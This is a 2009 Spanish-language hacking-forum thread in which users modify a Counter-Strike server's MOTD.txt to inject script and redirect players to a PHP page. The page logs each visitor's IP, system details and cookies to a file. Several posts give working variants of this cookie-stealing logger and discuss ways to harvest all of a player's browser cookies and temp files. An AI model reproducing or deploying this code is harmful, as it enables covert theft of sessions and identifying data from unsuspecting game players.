Counter strike MOTD.txt

Iniciado por fede_cp, 23 Diciembre 2009, 00:45 AM

0 Miembros y 1 Visitante están viendo este tema.

fede_cp

Bueno gente,el que alguna vez tubo un server de counter strike, sabe que el archivo MOTD.txt contiene ese especie de "portada", al iniciarse en un server.

aca el code del MOTD.txt

Código (html4strict) [Seleccionar]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Cstrike MOTD</title>
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
    }
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
    text-decoration:    underline;
}
a:link  {
   color:  #FFFFFF;
   }
a:visited   {
   color:  #FFFFFF;
   }
a:active    {
   color:  #FFFFFF;
   }
a:hover {
   color:  #FFFFFF;
   text-decoration:    underline;
   }
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike v1.6
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
</pre>
</body>
</html>


Supongo que sabran que significara todo esto, o lo habran visto alguna vez.

Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.

Código (html4strict) [Seleccionar]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>caca</title>
<script>alert("scripting")<script>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie=">
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
    }
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
    text-decoration:    underline;
}
a:link  {
   color:  #FFFFFF;
   }
a:visited   {
   color:  #FFFFFF;
   }
a:active    {
   color:  #FFFFFF;
   }
a:hover {
   color:  #FFFFFF;
   text-decoration:    underline;
   }
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike v1.6
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.com</a>
</pre>
</body>
</html>


le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.

aca web.php:

Código (php) [Seleccionar]
<html>
<head>
<title>Xss re pillo</html>
</head>
<body>
<?php
$ip 
$_SERVER['REMOTE_ADDR'];
$userAgent $_SERVER['HTTP_USER_AGENT'];
$cookie $_GET['cookie'];
$scuandal "ip-víctima:" $ip " sistema operativo:" PHP_OS " -Servidor :" $_SERVER['SERVER_NAME'] . " [+] info del server: " $_SERVER['SERVER_SOFTWARE'] . $cookie;
$fff fopen("archivo.txt","a");
fwrite($fff"$scuandal \n");
fclose($fff);
?>

<script>window.location='http://localhost/web.php?cookie='+document.cookie;</script>
</body>
</html>


y  :o, observen archivo.txt

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost
  • info del server: Apache/2.2.11 (Win32) PHP/5.3.0

    lo probe con un amigo y me da su info

    obvio que info del server va a ser mi info jajja

    bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.

    nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt

    si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.

    PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja

    saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Castg!

pero fede, es como un bucle infinito eso, yo diria de hacer algo asi:

este seria el archivo localhost/xss-cs/index.php :
Código (php) [Seleccionar]
<?php
if (isset($_GET['cookie'])){
$ip $_SERVER['REMOTE_ADDR'];
$userAgent $_SERVER['HTTP_USER_AGENT'];
$cookie $_GET['cookie'];
$scuandal "ip-víctima:" $ip " sistema operativo:" PHP_OS " -Servidor :" $_SERVER['SERVER_NAME'] . " [+] info del server: " $_SERVER['SERVER_SOFTWARE'] . $cookie;
$fff fopen("archivo.txt","a");
fwrite($fff"$scuandal \n");
fclose($fff);
}else{
header("Location ?cookie=$_SERVER['HTTP_COOKIE']");
}
?>


igual no creo que te de todas las cookies de todas las paginas.

fede_cp

igualmente si las cookies no las tiene, te da la info igual, asique no tiene que estar (isset)



saludos tomii!
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

tragantras

pero qué cookies espras que tenga el explorador web integrado del juego... xD
Colaboraciones:
1 2

Castg!

jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??

fede_cp

#5
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??

y claro, leer alguno de los archivos temp, como dice castg

habria que conseguir el code del browser

¿nadie sabe donde esta?
saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Castg!

increiblE! lo mismo con cuanto de diferencia? menos de un minuto jajaja
Cita de: cɐstg en 23 Diciembre 2009, 02:04 AM
jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??
Cita de: fede_cp en 23 Diciembre 2009, 02:05 AM
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??


saludos

Castg!

ah nono, disculpen mi terrible ignorancia, como no me di cuenta antes, que tanto bondi con get y eso, mas simple:

Código (php) [Seleccionar]
<?php
$ip 
$_SERVER['REMOTE_ADDR'];
$userAgent $_SERVER['HTTP_USER_AGENT'];
$cookie $_SERVER['HTTP_COOKIE'];
$scuandal "ip-víctima:" $ip " sistema operativo:" PHP_OS " -Servidor :" $_SERVER['SERVER_NAME'] . " [+] info del server: " $_SERVER['SERVER_SOFTWARE'] . $cookie;
$fff fopen("archivo.txt","a");
fwrite($fff"$scuandal \n");
fclose($fff);
?>


ahi no hay drama con nada, si la cookie es grande, si es chica, si es corta, si no lo puso en get si anda. listo. mucho mas facil.

fede_cp

Es lo que probe recien tom, pero no funca, alguien que este mas en el temaaa


saludos


PD:alguna idea buena
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

WHK

De hecho estoy 99% seguro que utilizan ieframe.dll de internet explorer, de hecho también estoy casi seguro de que si interpreta tu redirección entonces también debería interpretar código javascript xD pero no estoy seguro.

No se para que necesitas saber la ip si se supone que el servidor es tuyo y en la consola aparecen las ips conectadas xD pero igual es entrete ver todo eso, hay muchos servidores por ahi con ese contenido modificado para hacerse spam y cosas así.

Esto no es una vuln, es una feature como diría sdc xDDDD